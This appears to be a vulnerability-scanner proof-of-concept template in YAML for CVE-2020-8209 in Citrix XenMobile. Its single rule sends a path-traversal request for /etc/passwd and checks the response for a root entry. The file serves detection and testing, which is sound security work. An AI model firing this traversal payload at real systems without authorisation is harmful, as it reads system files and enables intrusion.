name: poc-yaml-citrix-xenmobile-cve-2020-8209
rules:
  - method: GET
    path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
    follow_redirects: false
    expression: |
      response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
detail:
  author: B1anda0(https://github.com/B1anda0)
  links:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8209